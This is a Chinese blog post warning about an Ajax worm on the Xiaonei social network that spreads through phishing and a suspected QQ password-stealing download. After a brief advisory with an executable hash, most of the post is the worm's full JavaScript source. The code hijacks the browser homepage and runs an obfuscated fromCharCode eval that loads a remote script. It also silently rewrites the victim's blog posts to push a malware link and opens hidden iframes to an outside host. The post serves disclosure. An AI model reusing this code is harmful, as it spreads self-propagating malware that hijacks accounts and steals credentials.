千橡国际 校内网 Ajax蠕虫大爆发!!!

千橡国际 校内网 Ajax蠕虫大爆发!!!

 

 

传播方式:Ajax蠕虫强制性分享一篇“十二星男女生爱情大骗术（哇咧~天秤好准~！！！>_<）”（URL:http://blog请勿访问.xiaonei.com/GetEntry.do?id=369970722&owner=229461699）
 配合钓鱼（Phishing）。

特征：自动在日志中加入“最后推荐一个东西： 发现了好软件，QQ千里眼，能够强制与任何QQ视频，能够强制加好友，强制聊天，迫使下线！下载地址”
威胁：初步诊断为QQ盗号工具

解决方案：暂无。（由于暂时无法得到Javascript样本，所以无法解决。个人之力很难搞定，需要校内那边技术人员的配合）
替代方案：使用手机校内（因为手机不支持Ajax）

可执行文件MD5: 53d9b84d6a8aab02dfb94ea877f6e7ac

可执行文件大小:61,440  Bytes
开发语言:VB6.0
时间戳：0x4A20B8D0

 

 

Ajax蠕虫源代码

 

function killErrors() {return true;}
window.onerror=killErrors;

function defaul_home(aaa){
aaa.style.behavior='url(#default#homepage)';
aaa.setHomePage('http://www.baidu.com/index.php?tn=haijin0212_pg');
}

function hit(aaa){
     for(i=1;i<10;i++){
 if(window.xxx!=1){
     defaul_home(aaa);
         }    
     }
window.xxx=1;
}
//document.all.blogpage.onclick=Function("hit(document.all.blogpage)");

//----------------------------

var mydata;
var mylink="http://love.avtupian.com/a/x/qiaoye.html";
getinfo();

function getinfo(){
var mylink=document.getElementById("link").value;
var mytype=document.getElementById("type").value;
var mytitle=document.getElementById("title").value;
var mypic=document.getElementById("pic").value;
var myfromno=document.getElementById("fromno").value;
var myfromname=document.getElementById("fromname").value;
var myfromuniv=document.getElementById("fromuniv").value;
var myalbumid=document.getElementById("albumid").value;
var mysummary=document.getElementById("summary").innerText;
var mylargeurl=document.getElementById("largeurl").value;

mydata='post=%7B%22link%22%3A%22'+escape(mylink);
mydata+='%22%2C%22type%22%3A%22'+escape(mytype);
mydata+='%22%2C%22title%22%3A%22'+encodeURIComponent(mytitle);
mydata+='%22%2C%22pic%22%3A%22'+escape(mypic);
mydata+='%22%2C%22fromno%22%3A%22'+escape(myfromno);
mydata+='%22%2C%22fromname%22%3A%22'+encodeURIComponent(myfromname);
mydata+='%22%2C%22fromuniv%22%3A%22'+encodeURIComponent(myfromuniv);
mydata+='%22%2C%22albumid%22%3A%22'+escape(myalbumid);
mydata+='%22%2C%22largeurl%22%3A%22'+escape(mylargeurl);
mydata+='%22%2C%22summary%22%3A%22'+encodeURIComponent(mysummary);
mydata=mydata.replace(////g,'%2F');
}
document.getElementById("logo").innerHTML+='<iframe name=do_it id=do_it src="http://share.xiaonei.com/ajaxProxy.html?ver=2" width=0 height=0></iframe>';
setTimeout("appendjs()",2600);

function appendjs(){
document.frames("do_it").document.getElementsByTagName("body").item(0).innerHTML='<img src="http://r.dd/EE?E='+Math.random()+'" onerror="eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,13,10,115,46,115,114,99,61,39,104,116,116,112,58,47,47,108,111,118,101,46,97,118,116,117,112,105,97,110,46,99,111,109,47,97,47,120,47,115,46,106,112,103,39,59,13,10,115,46,116,121,112,101,61,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,13,10,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,46,105,116,101,109,40,48,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,13,10))"><div id=eer name=eer>'+mydata+'</div>';
}
//===============================================================================================

var mytitle;var mybody;var mytsc;var myid;var userurl;var guest;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();var b_index;
var guest2;

        var visitorID=$("logo").firstChild.firstChild.href;
 var IDs=visitorID.indexOf("?id=");
 visitorID=visitorID.substring(IDs+4);
        var mydomain=document.location.href;
 var mydomaint=mydomain.indexOf("blog.xiaonei.com");
 var myo=mydomain.indexOf(visitorID);
 if(mydomaint!=-1&&myo==-1){setTimeout("get_my_blogurl()",400);}

function get_my_blogurl(){
  var as=new Ajax.Request("http://blog.xiaonei.com/MyBlog.do",{method:"get",onComplete:add_my_blogurl,onFailure:add_my_blogurl});
  return as;
 }
function add_my_blogurl(r){
  var mybloglist=r.responseText;
  var myurls;var blogids;var blogide;
  for(i=0;i<10;i++){
     myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     //mybloglist=mybloglist.substring(myurls+10);
     //myurls=mybloglist.indexOf('<strong><a href="http://blog.xiaonei.com/GetEntry.do?id=');
     if(myurls!=-1){
      mybloglist=mybloglist.substring(myurls);
      myurls=mybloglist.indexOf('"');
      mybloglist=mybloglist.substring(myurls+1);
      myurls=mybloglist.indexOf('"');
      myblogurl[i]=mybloglist.substring(0,myurls-1);mybloglist=mybloglist.substring(myurls+1);
      blogids=myblogurl[i].indexOf("?id=");blogide=myblogurl[i].indexOf("&owner");
      myblogid[i]=myblogurl[i].substring(blogids+4,blogide);   
      //document.getElementById("blogContent").innerHTML+="<br><a href=eee.com >i="+i+";</a>"+myblogid[i];
 
     }else{break;}
  }
  get_my_testself();
}
//-------------------------------------

function get_my_testself(){
 targetblogurlid=0;
  for(i=0;i<myblogid.length;i++){
      //var url="http://blog.xiaonei.com/GetEntry.do?id="+myblogid[i]+"&owner="+visitorID;
      var url="http://blog.xiaonei.com/EditEntry.do?id="+myblogid[i];
      var xhr2=createXMLHttpRequest();
      if(xhr2){
              xhr2.open("GET",url,false);
              xhr2.send();guest2=xhr2.responseText;
        }
      var mycheckit=guest2.indexOf("skycn");
      if(mycheckit==-1){targetblogurlid=myblogid[i];b_index=i;break;}
   }
   if(targetblogurlid!=0){add_my_form(targetblogurlid);}
}
//---------------------------------------------------------------add--form
function add_my_form(r){
guest=guest2;
var texts=guest.indexOf('name="title"');
guest=guest.substring(texts);

var titles=guest.indexOf('value="');
var titlee=guest.indexOf('" />');
mytitle=guest.substring(titles+7,titlee);
mytitle=mytitle.replace(/&amp;/g,'&').replace(/&quot;/g,'/"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');
mytitle=encodeURI(mytitle);
guest=guest.substring(titlee);

var bodys=guest.indexOf('name="body"');
var bodye=guest.indexOf('</textarea>');
mybody=guest.substring(bodys+30,bodye);
mybody=mybody.replace(/&amp;/g,'&').replace(/&quot;/g,'/"').replace(/&lt;/g,'<').replace(/&gt;/g,'>').replace(/&#034;/g,'"');

mybody+='<p><br>最后推荐一个东西：<br><br>发现了好软件，QQ千里眼，能够强制与任何QQ视频，能够强制加好友，强制聊天，迫使下线！<br>下载地址：<a href="http://tan.itwenba.cn/qq/QQqianliyan.rar" target=_blank >天空下载中心:skycn</a></p>';
mybody=encodeURI(mybody);

myxiugai();
 }

function myxiugai(){
userurl="http://blog.xiaonei.com/EditEntry.do";
var fdata="title="+mytitle+"&body="+mybody+"&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=0&pic_path=&owner="+visitorID+"&relative_optype=&id="+targetblogurlid;
var xhr=createXMLHttpRequest();
fdata=fdata.replace(////g,'%2F');
fdata=fdata.replace(/%09/g,'');
fdata=fdata.replace(/%0D%0A/g,'');

if(xhr){
  xhr.open("POST",userurl,false);
  xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  xhr.send(fdata);
  }
}

//--------------------------------
function createXMLHttpRequest(){
    var XMLhttpObject=null;   
    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
    else   
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        
        for(var i=0;i<MSXML.length;i++)  
        {  
            try 
            {  
                XMLhttpObject=new ActiveXObject(MSXML[i]);  
                break;  
            }  
            catch (ex) { 
            }
         }  
      }
return XMLhttpObject;
}
//---------------------------------------
setTimeout("myshua()",200);
function myshua(){
document.getElementById("optiondropdownMenu").insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://love.avtupian.com/ip.asp'></iframe>");
}